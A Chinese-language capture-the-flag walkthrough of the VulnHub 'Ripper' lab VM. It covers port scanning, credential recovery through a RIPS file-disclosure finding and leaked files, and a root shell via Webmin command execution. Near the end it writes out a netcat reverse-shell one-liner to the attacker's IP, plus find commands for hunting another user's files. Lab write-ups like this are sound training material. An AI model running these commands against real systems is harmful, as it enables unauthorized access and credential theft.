VnlnHub Ripper
靶场搭建
靶场下载地址:https://download.vulnhub.com/ripper/Ripper.ova
下载下来是虚拟机.ovf压缩文件,这个靶机是VirtualBox的,直接用VM打开会报错想要用VM打开可以看我这篇文章:如何将VirtualBox虚拟机转换到VMware中_奋斗吧!小胖子的博客-CSDN博客_virtualbox转vmware
打开后把网络模式设置为NAT模式(桥接模式也可以,和kali攻击机保持一致就可以)
开启虚拟机
靶场搭建完毕
渗透测试
由于不知道靶机ip,所以需要扫描NAT的网段
147为kali攻击机的ip,所以148为靶机ip
扫描靶机端口服务开放情况
开放了22端口,存在SSH服务
开放了80端口存在http服务,且中间件为Apache2.4.29
开放了10000端口,存在http服务,且中间件为MiniServ1.910(Webmin)
先访问一下80端口的WEB
为Apache初始页面
搜索一下敏感目录,使用了不同工具不同字典,但是没有发现其它敏感目录
所以我们先去看一下10000端口的WEB
让我们访问https://bogon:10000。,所以我们需要把这个域名添加到hosts文件中
访问发现是Webmin的后台登录页面
先尝试一下是否存在admin/admin/admin123这样的弱口令,发现不存在
搜索一下敏感目录
发现存在robots.txt,里面有一段base64编码
解码
提示说他们用rips扫描php代码
通过搜索知道它是一个PHP源代码审计工具RIPS
并且使用rips,可能会存在rips路径
尝试访问,发现没有
猜测可能是在80端口上,尝试访问,发现果然再80端口上
这是一个代码审计,找是否存在漏洞的自动化工具,所以我们再WEB的根目录(/var/www)扫描,并且勾选扫描子目录选项,进行扫描
扫描成功,查看结果
查找看是否存在可以利用的漏洞,发现存在文件泄露并且存在file参数
尝试利用,发现可以读网站根路径下的文件,但是不能读取web路径以外的路径
发现这个漏洞只能用于读取文件,不会进行解析
所以我们只能尝试去读取一些敏感信息
这个代码审计工具有搜索的功能,尝试看能不能搜索到关于账号密码的信息
搜索发现了一组用户名和密码
ssh服务是开启的,尝试登录,发现登录成功
获得到第一个flag
还发现一个可疑文件,但是为空,好像是让我们sudo提权为admin
但是发现没有sudo命令
在/home目录下发现还存在一个叫做cubes的用户,我们可能需要先提权到这个用户
使用其它方式提权
需要提权到cubes用户,所以我们现在找cubes权限的文件,并且可以被ripper读的文件
通过命令
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null查看cubes用户权限的文件
发现secret.file文件,查看文件
发现一段密码,猜测是cubes用户的密码,尝试登录,登录成功
尝试再次提权到root,sudo提权、suid提权、内核提权都不行
在尝试通过同样的方法在找找有什么其它特殊文件
发现有很多没用的目录和文件,经过过滤得到结果
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null | grep -v '.png' | grep -v '/proc' | grep -v '/sys'
发现一个miniser.log日志文件
在其中发现一对账号密码
猜测是登录webmin后台的,因为在webmin目录下
尝试登陆,登录成功
在左下角发现可以直接执行命令
发现权限为root
利用这个命令执行再反弹一个shell
先监听端口,然后执行命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f
获得第二个flag
此版本的webmin也存在rce漏洞,但是也需要账号密码,登陆后也可以通过漏洞来获得shell
VnlnHub Ripper相关推荐
- John the Ripper
John the Ripper John the Ripper(简称John)是一款著名的密码破解工具.它主要针对各种Hash加密的密文.它不同于Rainbow Table方式.它采用实时运算的方式和 ...
- RIPPER算法原理
在众多分类算法中,决策树作为一种基于有监督学习的层次模型被大量使用,其有一种其他算法难以比拟的优点:可解释性强--通过将学习到的决策树可以很轻易的转换成"如果-那么"形式的规则.但 ...
- StreamBox Ripper 将rm转mp3时候出现g2支持的问题
利用StreamBox Ripper(很多网站有下,很小的绿色软件,使用方便)可以将rm格式的 文件转换成mp3格式的文件但是一般大家安装的是realpalyer 10,StreamBox Rippe ...
- John the Ripper 密码破解者
John the Ripper
- 利用 John the Ripper 破解用户登录密码
一.什么是 John the Ripper ? 看到这个标题,想必大家都很好奇,John the Ripper 是个什么东西呢?如果直译其名字的话就是: John 的撕裂者(工具). 相比大家都会觉得 ...
- John the Ripper 著名密码破解工具
著名密码破解工具 John the Ripper 发布了 1.9.0-jumbo-1 版本. John the Ripper 是一款速度很快的密码破解工具,目前可用于 Unix.macOS.Windo ...
- Ninja ripper 工具使用教程
Ninja ripper 是一款用来导出任何安卓游戏的美术资源的工具.理论上可以导出任何游戏的模型,贴图.因为他的原理,不是解密程序,而是在运行时,接管D3D的API,从渲染API的参数中,获取美术 ...
- ninja ripper新版教程
之前的ninja ripper因为版本太旧了,对新的游戏可能支持不好,加上发现自己原本的教程也有一些问题,因此在这里重新写个新的教程_(:зゝ∠)_ 这个教程是以目前的最新版ninja ripper ...
- 还在寻找一款DVD全能转换器吗?WinX DVD Ripper for Mac它不香吗?
适用于Mac的WinX DVD Ripper (V6.2.0 Dec-13-2018)备份和翻录DVD到Mac iTunes iPhone iPod iPad Android具有顶级质量适用于Mac的 ...
最新文章
- 适配器模式:我真的不难
- Hello World With JBoss Modules
- Java 对比Vector、ArrayList、LinkedList
- AI基础:数据增强方法综述
- hierarchy change in CRM - step1 inbound CSAIBASE queue
- Python爬虫 senlenium爬取拉勾网招聘数据,你学会了吗
- iframe高度自适应
- 淘宝开放平台正式环境获取数据(一)
- 获取文件当前地址GetModuleFileName函数
- 再看经典推荐算法之召回算法
- C++ Segmentation fault 一般原因
- HDU 1054 Strategic Game(无向二分图的最大匹配)
- java生成离散型随机数_几种随机数生成方式
- windows进程/线程创建过程 --- windows操作系统学习
- STM32驱动SG90舵机
- 原来清理手机内存,使用管家是不够的!还需删除这4个文件夹
- Excel中的STDEV.P和STDEV.S函数的区别
- “3D游戏之父”考古“诺基亚时代”手游,网友:求支持智能手机!
- C++语言入门3(定义整数与整数输入)
- 计算机视觉传达论文库,计算机图形视觉传达论文